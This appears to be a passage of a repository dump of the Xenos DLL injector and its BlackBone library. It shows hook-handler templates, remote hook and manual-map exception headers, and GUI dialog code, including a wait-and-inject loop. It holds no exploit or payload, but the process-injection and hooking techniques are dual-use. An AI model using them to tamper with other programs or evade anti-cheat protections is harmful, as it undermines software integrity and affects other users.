ReturnType CallCallback( Args&&... args ) 61 | { 62 | if (_callbackClass != nullptr) 63 | return ((C*)_callbackClass->*brutal_cast(_callback))(args...); 64 | else 65 | return (reinterpret_cast(_callback))(args...); 66 | } 67 | }; 68 | 69 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/LocalHook/HookHandlerStdcall.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace blackbone 4 | { 5 | 6 | template 7 | struct HookHandler : public DetourBase 8 | { 9 | typedef typename std::conditional::value, int, R>::type ReturnType; 10 | 11 | typedef R( __stdcall *type )(Args...); 12 | typedef R( __stdcall *hktype )(Args&...); 13 | typedef R( C::*hktypeC )(Args&...); 14 | 15 | // 16 | // Workaround for void return type 17 | // 18 | typedef ReturnType( __stdcall *typeR )(Args...); 19 | typedef ReturnType( __stdcall *hktypeR )(Args&...); 20 | typedef ReturnType( C::*hktypeCR )(Args&...); 21 | 22 | static __declspec(noinline) ReturnType __stdcall Handler( Args... args ) 23 | { 24 | HookHandler* pInst = (HookHandler*)((_NT_TIB*)NtCurrentTeb())->ArbitraryUserPointer; 25 | return pInst->HandlerP( std::forward( args )... ); 26 | } 27 | 28 | ReturnType HandlerP( Args&&... args ) 29 | { 30 | ReturnType val_new, val_original; 31 | 32 | DisableHook(); 33 | 34 | if (_order == CallOrder::HookFirst) 35 | { 36 | val_new = CallCallback( std::forward( args )... ); 37 | val_original = CallOriginal( std::forward( args )... ); 38 | } 39 | else if (_order == CallOrder::HookLast) 40 | { 41 | val_original = CallOriginal( std::forward( args )... ); 42 | val_new = CallCallback( std::forward( args )... ); 43 | } 44 | else 45 | { 46 | val_original = val_new = CallCallback( std::forward( args )... ); 47 | } 48 | 49 | if (this->_hooked) 50 | EnableHook(); 51 | 52 | return (_retType == ReturnMethod::UseOriginal ? val_original : val_new); 53 | } 54 | 55 | inline ReturnType CallOriginal( Args&&... args ) 56 | { 57 | return (reinterpret_cast(_callOriginal))(args...); 58 | } 59 | 60 | inline ReturnType CallCallback( Args&&... args ) 61 | { 62 | if (_callbackClass != nullptr) 63 | return ((C*)_callbackClass->*brutal_cast(_callback))(args...); 64 | else 65 | return (reinterpret_cast(_callback))(args...); 66 | } 67 | }; 68 | 69 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/LocalHook/HookHandlerThiscall.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | namespace blackbone 4 | { 5 | 6 | template 7 | struct HookHandler : public DetourBase 8 | { 9 | typedef typename std::conditional::value, int, R>::type ReturnType; 10 | 11 | typedef R( __thiscall *type )(Args...); 12 | typedef R( __stdcall *hktype )(Args&...); 13 | typedef R( C::*hktypeC )(Args&...); 14 | 15 | // 16 | // Workaround for void return type 17 | // 18 | typedef ReturnType( __thiscall *typeR )(Args...); 19 | typedef ReturnType( __stdcall *hktypeR )(Args&...); 20 | typedef ReturnType( C::*hktypeCR )(Args&...); 21 | 22 | static __declspec(noinline) ReturnType __thiscall Handler( Args... args ) 23 | { 24 | HookHandler* pInst = (HookHandler*)((_NT_TIB*)NtCurrentTeb())->ArbitraryUserPointer; 25 | return pInst->HandlerP( std::forward( args )... ); 26 | } 27 | 28 | ReturnType HandlerP( Args&&... args ) 29 | { 30 | ReturnType val_new, val_original; 31 | 32 | DisableHook(); 33 | 34 | if (_order == CallOrder::HookFirst) 35 | { 36 | val_new = CallCallback( std::forward( args )... ); 37 | val_original = CallOriginal( std::forward( args )... ); 38 | } 39 | else if (_order == CallOrder::HookLast) 40 | { 41 | val_original = CallOriginal( std::forward( args )... ); 42 | val_new = CallCallback( std::forward( args )... ); 43 | } 44 | else 45 | { 46 | val_original = val_new = CallCallback( std::forward( args )... ); 47 | } 48 | 49 | if (this->_hooked) 50 | EnableHook(); 51 | 52 | return (_retType == ReturnMethod::UseOriginal ? val_original : val_new); 53 | } 54 | 55 | inline ReturnType CallOriginal( Args&&... args ) 56 | { 57 | return (reinterpret_cast(_callOriginal))( args...); 58 | } 59 | 60 | inline ReturnType CallCallback( Args&&... args ) 61 | { 62 | if (_callbackClass != nullptr) 63 | return ((C*)_callbackClass->*brutal_cast(_callback))( args...); 64 | else 65 | return (reinterpret_cast(_callback))( args...); 66 | } 67 | }; 68 | 69 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/LocalHook/HookHandlers.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "LocalHookBase.h" 4 | 5 | namespace blackbone 6 | { 7 | class BLACKBONE_API NoClass { }; 8 | 9 | template 10 | struct HookHandler; 11 | } 12 | 13 | #include "HookHandlerCdecl.h" 14 | 15 | #ifndef USE64 16 | #include "HookHandlerStdcall.h" 17 | #include "HookHandlerThiscall.h" 18 | #include "HookHandlerFastcall.h" 19 | #endif -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/ManualMap/MExcept.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../Include/Winheaders.h" 4 | #include "../Process/MemBlock.h" 5 | 6 | namespace blackbone 7 | { 8 | 9 | /// 10 | /// x64 exception module info 11 | /// 12 | struct ExceptionModule 13 | { 14 | ptr_t base; 15 | ptr_t size; 16 | }; 17 | 18 | 19 | /// 20 | /// x64 module table 21 | /// 22 | struct ModuleTable 23 | { 24 | ptr_t count; // Number of used entries 25 | ExceptionModule entry[250]; // Module data 26 | }; 27 | 28 | /// 29 | /// Exception handling support for arbitrary code 30 | /// 31 | class MExcept 32 | { 33 | public: 34 | BLACKBONE_API MExcept() = default; 35 | BLACKBONE_API ~MExcept() = default; 36 | 37 | /// 38 | /// Inject VEH wrapper into process 39 | /// Used to enable execution of SEH handlers out of image 40 | /// 41 | /// Target process 42 | /// Target module 43 | /// Partial exception support 44 | /// Error code 45 | BLACKBONE_API NTSTATUS CreateVEH( class Process& proc, ModuleData& mod, bool partial ); 46 | 47 | /// 48 | /// Removes VEH from target process 49 | /// 50 | /// Target process 51 | /// Partial exception support 52 | /// Mosule type 53 | /// Status code 54 | BLACKBONE_API NTSTATUS RemoveVEH( class Process& proc, bool partial, eModType mt ); 55 | 56 | /// 57 | /// Reset data 58 | /// 59 | BLACKBONE_API inline void reset() { _pModTable.Free(); } 60 | 61 | private: 62 | MExcept( const MExcept& ) = delete; 63 | MExcept& operator =(const MExcept&) = delete; 64 | 65 | private: 66 | MemBlock _pVEHCode; // VEH function codecave 67 | MemBlock _pModTable; // x64 module address range table 68 | uint64_t _hVEH = 0; // VEH handle 69 | 70 | static uint8_t _handler32[]; 71 | static uint8_t _handler64[]; 72 | }; 73 | 74 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Misc/InitOnce.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | namespace blackbone 3 | { 4 | extern const bool g_Initialized; 5 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Misc/Trace.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #pragma warning(disable : 4091) 7 | #include 8 | #pragma warning(default : 4091) 9 | 10 | namespace blackbone 11 | { 12 | #ifndef BLACBONE_NO_TRACE 13 | 14 | inline void DoTraceV( const char* fmt, va_list va_args ) 15 | { 16 | char buf[2048], userbuf[1024]; 17 | vsprintf_s( userbuf, fmt, va_args ); 18 | sprintf_s( buf, "BlackBone: %s\r\n", userbuf ); 19 | OutputDebugStringA( buf ); 20 | 21 | #ifdef CONSOLE_TRACE 22 | printf_s( buf ); 23 | #endif 24 | } 25 | 26 | inline void DoTraceV( const wchar_t* fmt, va_list va_args ) 27 | { 28 | wchar_t buf[2048], userbuf[1024]; 29 | vswprintf_s( userbuf, fmt, va_args ); 30 | swprintf_s( buf, L"BlackBone: %ls\r\n", userbuf ); 31 | OutputDebugStringW( buf ); 32 | 33 | #ifdef CONSOLE_TRACE 34 | wprintf_s( buf ); 35 | #endif 36 | } 37 | 38 | template 39 | inline void DoTrace( const Ch* fmt, ... ) 40 | { 41 | va_list va_args; 42 | va_start( va_args, fmt ); 43 | DoTraceV( fmt, va_args ); 44 | va_end( va_args ); 45 | } 46 | 47 | #define BLACKBONE_TRACE(fmt, ...) DoTrace(fmt, ##__VA_ARGS__) 48 | 49 | #else 50 | #define BLACKBONE_TRACE(...) 51 | #endif 52 | 53 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/PE/ImageNET.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "../Config.h" 3 | #ifdef COMPILER_MSVC 4 | 5 | #include "../Include/Winheaders.h" 6 | 7 | #include 8 | 9 | #pragma warning(disable : 4091) 10 | #include "cor.h" 11 | #include 12 | #pragma warning(default : 4091) 13 | 14 | namespace blackbone 15 | { 16 | 17 | /// 18 | /// .NET metadata parser 19 | /// 20 | class ImageNET 21 | { 22 | public: 23 | typedef std::map, uintptr_t> mapMethodRVA; 24 | 25 | public: 26 | BLACKBONE_API ImageNET(void); 27 | BLACKBONE_API ~ImageNET(void); 28 | 29 | /// 30 | /// Initialize COM classes 31 | /// 32 | /// Image file path 33 | /// true on success 34 | BLACKBONE_API bool Init( const std::wstring& path ); 35 | 36 | /// 37 | /// Extract methods from image 38 | /// 39 | /// Found Methods 40 | /// true on success 41 | BLACKBONE_API bool Parse( mapMethodRVA* methods = nullptr ); 42 | 43 | /// 44 | /// Get image .NET runtime version 45 | /// 46 | /// runtime version, "n/a" if nothing found 47 | BLACKBONE_API static std::wstring GetImageRuntimeVer( const wchar_t* ImagePath ); 48 | 49 | private: 50 | std::wstring _path; // Image path 51 | mapMethodRVA _methods; // Image methods 52 | 53 | // COM helpers 54 | CComPtr _pMetaDisp; 55 | CComPtr _pMetaImport; 56 | CComPtr _pAssemblyImport; 57 | }; 58 | 59 | } 60 | 61 | #endif -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Patterns/PatternSearch.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Patterns/PatternSearch.cpp -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Patterns/PatternSearch.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Patterns/PatternSearch.h -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Process/RPC/RemoteLocalHook.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../../Config.h" 4 | #include "../../Asm/AsmFactory.h" 5 | #include "../../Include/Types.h" 6 | #include "../MemBlock.h" 7 | 8 | 9 | namespace blackbone 10 | { 11 | 12 | /// 13 | /// Hook data, sizeof = 0x50 bytes 14 | /// 15 | #pragma pack(push, 1) 16 | struct HookCtx32 17 | { 18 | uint32_t codeSize; // Size of saved code 19 | uint32_t jmp_size; // Size of jump from thunk to original 20 | uint8_t original_code[29]; // Original function code 21 | 22 | union 23 | { 24 | uint8_t jmp_code[5]; // Jump instruction 25 | struct 26 | { 27 | uint8_t opcode; 28 | int32_t ptr; 29 | } jmp; 30 | }; 31 | }; 32 | 33 | struct HookCtx64 34 | { 35 | uint64_t dst_ptr; // Target address 36 | uint32_t codeSize; // Size of saved code 37 | uint8_t original_code[32]; // Original function code 38 | uint8_t far_jmp[6]; // Far jump code 39 | }; 40 | #pragma pack(pop) 41 | 42 | union HookCtx 43 | { 44 | HookCtx32 hook32; 45 | HookCtx64 hook64; 46 | }; 47 | 48 | 49 | /// 50 | /// In-process remote hook 51 | /// 52 | class RemoteLocalHook 53 | { 54 | public: 55 | RemoteLocalHook( class Process& process ); 56 | ~RemoteLocalHook(); 57 | 58 | NTSTATUS SetHook( ptr_t address, asmjit::Assembler& hook ); 59 | NTSTATUS Restore(); 60 | 61 | private: 62 | RemoteLocalHook( const RemoteLocalHook& ) = delete; 63 | RemoteLocalHook& operator = (const RemoteLocalHook&) = delete; 64 | 65 | NTSTATUS AllocateMem( ptr_t address, size_t codeSize ); 66 | 67 | NTSTATUS SetHook32( ptr_t address, asmjit::Assembler& hook ); 68 | 69 | NTSTATUS SetHook64( ptr_t address, asmjit::Assembler& hook ); 70 | 71 | bool CopyOldCode( ptr_t address, bool x64 ); 72 | 73 | private: 74 | class Process& _process; 75 | HookCtx _ctx; 76 | MemBlock _hookData; 77 | ptr_t _pHookCode = 0; 78 | ptr_t _pThunkCode = 0; 79 | ptr_t _address = 0; 80 | 81 | bool _hooked = false; 82 | bool _hook64 = false; 83 | }; 84 | 85 | } -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/AsmHelper32.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Win32/Debug/AsmHelper32.obj -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/AsmHelper64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Win32/Debug/AsmHelper64.obj -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.log: -------------------------------------------------------------------------------- 1 |  assembler.cpp 2 | codegen.cpp 3 | constpool.cpp 4 | containers.cpp 5 | cpuinfo.cpp 6 | cputicks.cpp 7 | error.cpp 8 | globals.cpp 9 | operand.cpp 10 | runtime.cpp 11 | string.cpp 12 | vmem.cpp 13 | zone.cpp 14 | x86assembler.cpp 15 | x86cpuinfo.cpp 16 | x86inst.cpp 17 | x86operand.cpp 18 | x86operand_regs.cpp 19 | wow64ext.cpp 20 | AsmHelper32.cpp 21 | AsmHelper64.cpp 22 | DriverControl.cpp 23 | LocalHookBase.cpp 24 | TraceHook.cpp 25 | MExcept.cpp 26 | MMap.cpp 27 | NtLoader.cpp 28 | InitOnce.cpp 29 | NameResolve.cpp 30 | PatternLoader.cpp 31 | Utils.cpp 32 | PatternSearch.cpp 33 | ImageNET.cpp 34 | PEImage.cpp 35 | MemBlock.cpp 36 | Process.cpp 37 | ProcessCore.cpp 38 | ProcessMemory.cpp 39 | ProcessModules.cpp 40 | RemoteExec.cpp 41 | RemoteHook.cpp 42 | RemoteLocalHook.cpp 43 | RemoteMemory.cpp 44 | Thread.cpp 45 | Threads.cpp 46 | NativeSubsystem.cpp 47 | Wow64Subsystem.cpp 48 | x86Subsystem.cpp 49 | LDasm.c 50 | BlackBone.vcxproj -> C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos\build\Win32\Debug\BlackBone.lib 51 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.pdb -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.tlog/BlackBone.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.15063.0 2 | Debug|Win32|C:\Users\rmt01\Dropbox\WindowsBox\Kodning\Fusk\Injector\C++\Xenos\| 3 | -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Win32/Debug/BlackBone.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/BlackBone/Win32/Debug/assembler.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/ext/blackbone/src/BlackBone/Win32/Debug/assembler.obj -------------------------------------------------------------------------------- /Xenos/ext/blackbone/src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 2.8) 2 | project (BlackBone) 3 | 4 | SET(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /std:c++latest" ) 5 | 6 | add_subdirectory(BlackBone) 7 | add_subdirectory(TestApp) -------------------------------------------------------------------------------- /Xenos/src/Button.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Control.hpp" 4 | 5 | namespace ctrl 6 | { 7 | 8 | class Button : public Control 9 | { 10 | public: 11 | Button( HWND hwnd = NULL ) 12 | : Control( hwnd ) { } 13 | 14 | virtual bool checked() const { return Button_GetCheck( _hwnd ) != BST_UNCHECKED; } 15 | virtual void checked( bool state ) { Button_SetCheck( _hwnd, state ); } 16 | 17 | inline operator bool() { return checked(); } 18 | }; 19 | 20 | } -------------------------------------------------------------------------------- /Xenos/src/ComboBox.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Control.hpp" 4 | 5 | namespace ctrl 6 | { 7 | 8 | class ComboBox : public Control 9 | { 10 | public: 11 | ComboBox( HWND hwnd = NULL ) 12 | : Control( hwnd ) { } 13 | 14 | virtual inline int selection() const { return ComboBox_GetCurSel( _hwnd ); } 15 | virtual inline int selection( int index ) { return ComboBox_SetCurSel( _hwnd, index ); } 16 | 17 | virtual inline int itemData( int index ) const { return (int)ComboBox_GetItemData( _hwnd, index ); } 18 | virtual inline int itemData( int index, int data ) { return (int)ComboBox_SetItemData( _hwnd, index, data ); } 19 | 20 | virtual inline void reset() { ComboBox_ResetContent( _hwnd ); } 21 | 22 | virtual int Add( const std::wstring& text, int data = 0 ) 23 | { 24 | auto idx = ComboBox_AddString( _hwnd, text.c_str() ); 25 | ComboBox_SetItemData( _hwnd, idx, data ); 26 | 27 | return idx; 28 | } 29 | 30 | virtual int Add( const std::string& text, int data = 0 ) 31 | { 32 | auto idx = (int)SendMessageA( _hwnd, CB_ADDSTRING, 0, (LPARAM)text.c_str() ); 33 | ComboBox_SetItemData( _hwnd, idx, data ); 34 | 35 | return idx; 36 | } 37 | 38 | virtual std::wstring itemText( int index ) const 39 | { 40 | wchar_t buf[512] = { 0 }; 41 | ComboBox_GetLBText( _hwnd, index, buf ); 42 | 43 | return buf; 44 | } 45 | 46 | virtual void modifyItem( int index, const std::wstring& text, int data = 0 ) 47 | { 48 | auto oldData = itemData( index ); 49 | if (data == 0) 50 | data = oldData; 51 | 52 | ComboBox_DeleteString( _hwnd, index ); 53 | index = ComboBox_InsertString( _hwnd, index, text.c_str() ); 54 | ComboBox_SetItemData( _hwnd, index, data ); 55 | } 56 | 57 | virtual std::wstring selectedText() const 58 | { 59 | wchar_t buf[512] = { 0 }; 60 | ComboBox_GetText( _hwnd, buf, ARRAYSIZE(buf) ); 61 | 62 | return buf; 63 | } 64 | 65 | virtual inline void selectedText( const std::wstring& text ) { ComboBox_SetText( _hwnd, text.c_str() ); } 66 | }; 67 | 68 | } -------------------------------------------------------------------------------- /Xenos/src/Control.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Window.hpp" 4 | 5 | namespace ctrl 6 | { 7 | 8 | class Control : public Window 9 | { 10 | public: 11 | Control( HWND hwnd = NULL ) 12 | : Window( hwnd ) { } 13 | }; 14 | 15 | } -------------------------------------------------------------------------------- /Xenos/src/DlgModules.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Dialog.hpp" 4 | #include "resource.h" 5 | #include "ListView.hpp" 6 | 7 | #include 8 | #include 9 | 10 | class ModulesDlg : public Dialog 11 | { 12 | enum ColumnID 13 | { 14 | Name = 0, 15 | ImageBase, 16 | Platform, 17 | LoadType 18 | }; 19 | 20 | public: 21 | ModulesDlg( blackbone::Process& proc ); 22 | ~ModulesDlg(); 23 | 24 | private: 25 | /// 26 | /// Refresh module list 27 | /// 28 | void RefreshList(); 29 | 30 | MSG_HANDLER( OnInit ); 31 | MSG_HANDLER( OnCloseBtn ); 32 | MSG_HANDLER( OnUnload ); 33 | 34 | private: 35 | ctrl::ListView _modList; 36 | blackbone::Process& _process; 37 | }; -------------------------------------------------------------------------------- /Xenos/src/DlgWait.cpp: -------------------------------------------------------------------------------- 1 | #include "DlgWait.h" 2 | #include 3 | 4 | DlgWait::DlgWait( InjectionCore& core, InjectContext& context ) 5 | : Dialog( IDD_WAIT_PROC ) 6 | , _core( core ) 7 | , _context( context ) 8 | , _waitThread( &DlgWait::WaitForInjection, this ) 9 | { 10 | _events[ID_WAIT_CANCEL] = static_cast(&DlgWait::OnCloseBtn); 11 | } 12 | 13 | DlgWait::~DlgWait() 14 | { 15 | if (_waitThread.joinable()) 16 | _waitThread.join(); 17 | } 18 | 19 | INT_PTR DlgWait::OnInit( HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam ) 20 | { 21 | Dialog::OnInit( hDlg, message, wParam, lParam ); 22 | std::wstring text = L"Awaiting '" + blackbone::Utils::StripPath( _context.procPath ) + L"' launch..."; 23 | 24 | Static_SetText( GetDlgItem( hDlg, IDC_WAIT_TEXT ), text.c_str() ); 25 | SendMessage( GetDlgItem( hDlg, IDC_WAIT_BAR ), PBM_SETMARQUEE, (WPARAM)TRUE, (LPARAM)30 ); 26 | 27 | return TRUE; 28 | } 29 | 30 | INT_PTR DlgWait::OnCloseBtn( HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam ) 31 | { 32 | _context.waitActive = false; 33 | return TRUE; 34 | } 35 | 36 | /// 37 | /// Wait for injection 38 | /// 39 | /// Error code 40 | NTSTATUS DlgWait::WaitForInjection() 41 | { 42 | for (bool inject = true; inject && _status != STATUS_REQUEST_ABORTED; inject = _context.cfg.injIndef) 43 | _status = _core.InjectMultiple( &_context ); 44 | 45 | CloseDialog(); 46 | return _status; 47 | } -------------------------------------------------------------------------------- /Xenos/src/DlgWait.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Dialog.hpp" 4 | #include "resource.h" 5 | #include "InjectionCore.h" 6 | 7 | #include 8 | #include 9 | 10 | class DlgWait : public Dialog 11 | { 12 | public: 13 | DlgWait( InjectionCore& core, InjectContext& context ); 14 | ~DlgWait(); 15 | 16 | inline NTSTATUS status() const { return _status; } 17 | 18 | private: 19 | /// 20 | /// Wait for injection 21 | /// 22 | /// Error code 23 | NTSTATUS WaitForInjection(); 24 | 25 | MSG_HANDLER( OnInit ); 26 | MSG_HANDLER( OnCloseBtn ); 27 | 28 | private: 29 | InjectionCore& _core; 30 | InjectContext& _context; 31 | std::thread _waitThread; 32 | NTSTATUS _status = STATUS_SUCCESS; 33 | }; 34 | 35 | -------------------------------------------------------------------------------- /Xenos/src/EditBox.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Control.hpp" 4 | 5 | namespace ctrl 6 | { 7 | 8 | class EditBox : public Control 9 | { 10 | public: 11 | EditBox( HWND hwnd = NULL ) 12 | : Control( hwnd ) { } 13 | 14 | virtual std::wstring text() const 15 | { 16 | wchar_t buf[512] = { 0 }; 17 | Edit_GetText( _hwnd, buf, ARRAYSIZE( buf ) ); 18 | 19 | return buf; 20 | } 21 | 22 | virtual inline long integer() { return std::wcstol( text().c_str(), nullptr, 10 ); } 23 | 24 | virtual inline BOOL text( const std::wstring& text ) const { return Edit_SetText( _hwnd, text.c_str() ); } 25 | 26 | virtual inline void reset() { Edit_SetText( _hwnd, L"" ); } 27 | }; 28 | 29 | } -------------------------------------------------------------------------------- /Xenos/src/FileUtil.cpp: -------------------------------------------------------------------------------- 1 | #include "FileUtil.h" 2 | #include "StringUtil.h" 3 | 4 | #include 5 | 6 | #include 7 | 8 | template 9 | bool read_helper(const std::wstring& path, Container& container) 10 | { 11 | std::basic_ifstream f(path, std::ios_base::binary); 12 | 13 | if (!f.good()) 14 | return false; 15 | 16 | container.assign((std::istreambuf_iterator(f)), 17 | std::istreambuf_iterator()); 18 | container.push_back(acut::ensure_tchar('\0')); 19 | 20 | return true; 21 | } 22 | 23 | 24 | bool acut::read_file(const std::wstring& path, std::string& buffer) 25 | { 26 | return read_helper(path, buffer); 27 | } 28 | 29 | bool acut::read_file(const std::wstring& path, std::vector& buffer) 30 | { 31 | return read_helper(path, buffer); 32 | } 33 | 34 | bool acut::read_file(const std::wstring& path, std::wstring& buffer) 35 | { 36 | return read_helper(path, buffer); 37 | } 38 | 39 | bool acut::read_file(const std::wstring& path, std::vector& buffer) 40 | { 41 | return read_helper(path, buffer); 42 | } 43 | 44 | bool acut::file_exists( const std::wstring& filename ) 45 | { 46 | return (GetFileAttributesW( filename.c_str() ) != INVALID_FILE_ATTRIBUTES); 47 | } 48 | 49 | -------------------------------------------------------------------------------- /Xenos/src/FileUtil.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #define ACUT_SLASH L'\\' 10 | #define ACUT_SLASH_STR L"\\" 11 | #define ACUT_SLASH_UTF8 '\\' 12 | #define ACUT_SLASH_STR_UTF8 "\\" 13 | 14 | namespace acut 15 | { 16 | // suitable only for reading small text files into a buffer 17 | bool read_file(const std::wstring& path, std::string& buffer); 18 | bool read_file(const std::wstring& path, std::vector& buffer); 19 | bool read_file(const std::wstring& path, std::wstring& buffer); 20 | bool read_file(const std::wstring& path, std::vector& buffer); 21 | 22 | std::wstring full_path(const std::wstring& filename); 23 | bool file_exists(const std::wstring& filename); 24 | } 25 | 26 | 27 | -------------------------------------------------------------------------------- /Xenos/src/ListView.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Control.hpp" 4 | 5 | #include 6 | 7 | namespace ctrl 8 | { 9 | 10 | class ListView : public Control 11 | { 12 | public: 13 | ListView( HWND hwnd = NULL ) 14 | : Control( hwnd ) { } 15 | 16 | virtual int AddColumn( const std::wstring& name, int width, int iSubItem = 0 ) 17 | { 18 | LVCOLUMNW lvc = { 0 }; 19 | 20 | lvc.mask = LVCF_WIDTH | LVCF_TEXT | LVCF_SUBITEM; 21 | lvc.pszText = (LPWSTR)name.c_str(); 22 | lvc.iSubItem = iSubItem; 23 | lvc.cx = width; 24 | 25 | return ListView_InsertColumn( _hwnd, iSubItem, &lvc ); 26 | } 27 | 28 | virtual int AddItem( const std::wstring& text, LPARAM lParam, const std::initializer_list& args = { } ) 29 | { 30 | LVITEMW lvi = { 0 }; 31 | 32 | lvi.mask = LVIF_TEXT | LVIF_PARAM; 33 | 34 | lvi.pszText = (LPWSTR)text.c_str(); 35 | lvi.cchTextMax = static_cast(text.length()) + 1; 36 | lvi.lParam = lParam; 37 | lvi.iItem = ListView_GetItemCount( _hwnd ); 38 | 39 | int pos = ListView_InsertItem( _hwnd, &lvi ); 40 | 41 | for (size_t i = 0; i < args.size(); i++) 42 | ListView_SetItemText( _hwnd, pos, (int)(i + 1), (LPWSTR)(args.begin() + i)->c_str() ); 43 | 44 | return pos; 45 | } 46 | 47 | virtual std::wstring itemText( int idx, int iSubItem = 0 ) 48 | { 49 | wchar_t buf[256] = { 0 }; 50 | ListView_GetItemText( _hwnd, idx, iSubItem, buf, ARRAYSIZE( buf ) ); 51 | 52 | return buf; 53 | } 54 | 55 | virtual inline void RemoveItem( int idx ) { ListView_DeleteItem( _hwnd, idx ); } 56 | 57 | virtual inline int selection() const { return ListView_GetNextItem( _hwnd, -1, LVNI_SELECTED ); } 58 | 59 | virtual inline void reset() { ListView_DeleteAllItems( _hwnd ); } 60 | }; 61 | 62 | } 63 | -------------------------------------------------------------------------------- /Xenos/src/Message.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "stdafx.h" 4 | #include "Log.h" 5 | 6 | class Message 7 | { 8 | enum MsgType 9 | { 10 | Error, 11 | Warning, 12 | Info, 13 | Question, 14 | }; 15 | 16 | public: 17 | static void ShowError( HWND parent, const std::wstring& msg, const std::wstring& title = L"Error" ) 18 | { 19 | Show( msg, title, Error, parent ); 20 | } 21 | 22 | static void ShowWarning( HWND parent, const std::wstring& msg, const std::wstring& title = L"Warning" ) 23 | { 24 | Show( msg, title, Warning, parent ); 25 | } 26 | 27 | static void ShowInfo( HWND parent, const std::wstring& msg, const std::wstring& title = L"Info" ) 28 | { 29 | Show( msg, title, Info, parent ); 30 | } 31 | 32 | static bool ShowQuestion( HWND parent, const std::wstring& msg, const std::wstring& title = L"Question" ) 33 | { 34 | return Show( msg, title, Question, parent ) == IDYES; 35 | } 36 | 37 | private: 38 | static int Show( 39 | const std::wstring& msg, 40 | const std::wstring& title, 41 | MsgType type, 42 | HWND parent = NULL 43 | ) 44 | { 45 | UINT uType = MB_ICONERROR; 46 | xlog::LogLevel::e logLevel = xlog::LogLevel::error; 47 | 48 | if (type == Warning) 49 | { 50 | uType = MB_ICONWARNING; 51 | logLevel = xlog::LogLevel::warning; 52 | } 53 | else if (type == Info) 54 | { 55 | 